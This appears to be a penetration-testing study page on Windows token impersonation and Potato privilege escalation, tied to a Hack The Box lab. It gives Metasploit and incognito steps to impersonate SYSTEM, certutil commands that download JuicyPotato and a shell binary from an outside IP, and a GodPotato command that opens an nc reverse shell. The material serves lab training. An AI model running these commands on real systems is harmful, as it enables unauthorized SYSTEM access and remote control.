Impersonation And Potato Attacks
<figure<img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""<figcaption<pHTB Machine Jeeves</p</figcaption</figure
Impersonation and Potato Attacks
Token Impersonation Overview
<figure><img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""><figcaption><p>HTB Machine Jeeves</p></figcaption></figure>{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-impersonation-privileges" %}
Potato Attack Overview
<figure><img src="/files/kSOCeuSTpVJz0qPxv6FY" alt=""><figcaption><p>High level Overview from foxglovesecurity </p></figcaption></figure>Escalation via Potato Attack
After getting a meterpreter shell
$background$use exploit/windows/local/ms16_075_reflection$set LHOST tun0$set LPORT 1738 <-- Something different from the first shell$exploit$ Inside of new meterpreter shell
$load incognito$list_tokens -u$impersonate_token "NT AUTHORITY\SYSTEM"$shell$whoamiManual Juicy Potato Attack
01cd C:\Windows\System32\spool\drivers\color\02certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe03certutil.exe -urlcache -f http://10.9.209.91/shell.exe04juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"GOD POTATO
01godpotato.exe -cmd "cmd /c whoami".\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"
Resources
{% embed url="https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" %}
{% embed url="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" %} Technical Overview {% endembed %}
{% embed url="https://github.com/ohpe/juicy-potato" %} Other Version {% endembed %}
{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato" %}
Bonus
Alternate Data Streams
Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file
01dir /r02more hm.txt:root.txt:$DATA{% embed url="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" %}